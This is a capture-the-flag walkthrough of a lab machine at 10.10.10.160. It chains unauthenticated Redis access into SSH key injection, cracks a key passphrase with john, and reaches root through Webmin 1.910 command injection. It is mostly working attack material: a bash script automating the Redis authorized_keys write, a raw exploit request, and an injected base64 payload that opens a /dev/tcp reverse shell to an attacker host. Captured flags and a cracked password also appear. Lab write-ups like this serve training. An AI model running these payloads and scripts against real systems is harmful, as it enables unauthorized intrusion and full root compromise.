Information Gathering
IP Address | Open Ports |
---|---|
10.10.10.160 | TCP: 22, 80, 6379, 10000 |
$ nmap -p- 10.10.10.160 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Unauthenticated Redis access & SSH public key injection
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET *
10.10.10.160:6379> CONFIG GET dir
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
A reply of OK proves the directory exists: CONFIG SET dir makes Redis chdir() into the path and returns an error if it cannot.
$ cat ~/.ssh/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOAuKxlopDqsLWIAFeZFEOiSBz9K/go+OybYs5gwGEBE maptnh@maptnh
$ (echo -e "\n\n";cat ~/.ssh/id_ed25519.pub;echo -e "\n\n")>key.txt;cat key.txt | redis-cli -h 10.10.10.160 -x set id_rsa_key
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> GET id_rsa_key
10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
10.10.10.160:6379> CONFIG SET dbfilename authorized_keys
10.10.10.160:6379> save
10.10.10.160:6379> exit
CONFIG SET dir and CONFIG SET dbfilename normally tell Redis where to write its RDB snapshot. Pointing them at /var/lib/redis/.ssh and authorized_keys and then issuing SAVE makes Redis dump its whole dataset, including the value we stored, into /var/lib/redis/.ssh/authorized_keys. The dump is mostly binary, but sshd reads authorized_keys line by line and skips lines it cannot parse; that is why the key was wrapped in blank lines before being stored, so that it lands on a line of its own between the RDB header and trailer. SAVE overwrites whatever authorized_keys already existed there, and the file is written by the redis user, whose home directory this is, so the key logs us in as redis. The root cause is a Redis instance exposed on the network with no requirepass and CONFIG enabled; binding to 127.0.0.1 (or protected-mode), setting a password, or rename-command CONFIG "" each closes this path.
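The procedure above, wrapped into a script, as an added example that is not part of the original writeup. It also includes an offline check of the point just made about padding: a constructed RDB-like dump is built around the key with and without the surrounding blank lines, and the key is counted as usable only when a line starts with the key type, which is what sshd requires. The host, port, key file and .ssh directory are parameters; the key material, the fake RDB header and trailer bytes, and the function names are assumptions made for the demo. Only inject_key needs redis-cli and a reachable target.

```bash
#!/usr/bin/env bash
# Added example: Redis CONFIG SET dir/dbfilename -> authorized_keys injection,
# plus an offline demonstration of why the key must be padded with newlines.
set -u

# Wrap a public key in blank lines so that, once Redis dumps the dataset with
# the key as a stored value, the key sits on a line of its own between the
# binary RDB header and trailer.
build_payload() {   # build_payload <pubkey-file> <out-file>
    { printf '\n\n'; cat "$1"; printf '\n\n'; } > "$2"
}

# Perform the injection against a Redis instance that accepts CONFIG SET
# without authentication (the situation on the page). Not run by the test.
inject_key() {      # inject_key <host> <port> <payload-file> <ssh-dir>
    local host=$1 port=$2 payload=$3 sshdir=$4
    redis-cli -h "$host" -p "$port" -x set injected_key < "$payload" >/dev/null
    # CONFIG SET dir fails unless the directory exists, so it doubles as a probe.
    redis-cli -h "$host" -p "$port" config set dir "$sshdir" | grep -q OK || return 1
    redis-cli -h "$host" -p "$port" config set dbfilename authorized_keys >/dev/null
    redis-cli -h "$host" -p "$port" save
}

# Simulate the dump: constructed header bytes, the stored value, constructed
# trailer bytes. This is an illustration of the shape, not a real RDB layout.
fake_rdb() {        # fake_rdb <value-file> <out-file>
    { printf 'REDIS0008\372\011redis-ver\376\001'; cat "$1"; printf '\377\001\002\003'; } > "$2"
}

# sshd parses authorized_keys line by line and ignores unparseable lines, so
# the key is only usable if some line starts with the key type.
count_usable_keys() {   # count_usable_keys <file>
    grep -a -c '^ssh-ed25519 ' "$1" || true
}

# Build both variants from a constructed (not real) public key and report how
# many usable key lines each dump contains.
demo_padding_check() {
    local tmp
    tmp=$(mktemp -d)
    printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyMaterialForTheDemoOnly lab@example\n' > "$tmp/key.pub"
    fake_rdb "$tmp/key.pub" "$tmp/unpadded.rdb"          # key stored as-is
    build_payload "$tmp/key.pub" "$tmp/key.txt"           # key with blank lines
    fake_rdb "$tmp/key.txt" "$tmp/padded.rdb"
    printf 'unpadded=%s padded=%s\n' \
        "$(count_usable_keys "$tmp/unpadded.rdb")" \
        "$(count_usable_keys "$tmp/padded.rdb")"
    rm -rf "$tmp"
}

# Usage: ./redis_ssh_inject.sh demo
#        ./redis_ssh_inject.sh inject 10.10.10.160 6379 key.txt /var/lib/redis/.ssh
case "${1:-}" in
    demo)   demo_padding_check ;;
    inject) build_payload "$4" "$4.padded" && inject_key "$2" "$3" "$4.padded" "$5" ;;
esac
```

Without the padding the key shares a line with the RDB header bytes and sshd never sees a valid key, which is the failure mode behind the `echo -e "\n\n"` in the one-liner above.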
$ ssh -i ~/.ssh/id_ed25519 redis@10.10.10.160
Cracking the RSA private key passphrase
$ cat /opt/id_rsa.bak
(copied to the attacking machine as id_rsa)
$ ssh2john id_rsa > ./id_rsa.john
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.john
password: computer2008
The passphrase is reused as Matt's login password, so switching user works directly:
$ su Matt
User.txt
9d90e967236578fdf6be43ea87c03a53
Privilege Escalation
$ whatweb https://10.10.10.160:10000 -v
$ searchsploit Webmin
Webmin 1.910 has an authenticated command injection in the Package Updates module (CVE-2019-12840): the u parameter of /package-updates/update.cgi is interpolated into a shell command, and Webmin runs as root. Any account allowed to use that module is enough, and Matt's reused password gets us in.
https://github.com/KentVolt/Webmin-1.910-Exploit/blob/master/Webmin%201.910%20-%20Remote%20Code%20Execution%20using%20BurpSuite
https://10.10.10.160:10000/
username: Matt  password: computer2008
https://10.10.10.160:10000/package-updates/?xnavigation=1
On the attacking machine, watch for the ICMP callback that confirms code execution:
$ sudo tcpdump -i any icmp
Request captured in Burp (Content-Length is recalculated when the body is swapped):
POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.160:10000
Cookie: redirect=1; testing=1; sid=43462a3948984572e11138d45052c3d8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Progressive-Url: https://10.10.10.160:10000/package-updates/update.cgi
X-Requested-From: package-updates
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Length: 19
Origin: https://10.10.10.160:10000
Referer: https://10.10.10.160:10000/package-updates/update.cgi?xnavigation=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Body 1, blind test: the server pings us and the packet shows up in tcpdump.
u=acl%2Fapt&u=$(ping%20-c%201%2010.10.16.14)
Body 2, reverse shell: the base64 decodes to /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.14/10035 0>&1', so start a listener on port 10035 first (e.g. nc -lvnp 10035). ${IFS} stands in for spaces so the injected text carries no spaces or single quotes of its own.
u=acl%2Fapt&u=$(echo${IFS}"L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMTQvMTAwMzUgMD4mMScK"|base64${IFS}-d|bash)
Root.txt
ded02459b6863f771d4371e25ee2c11c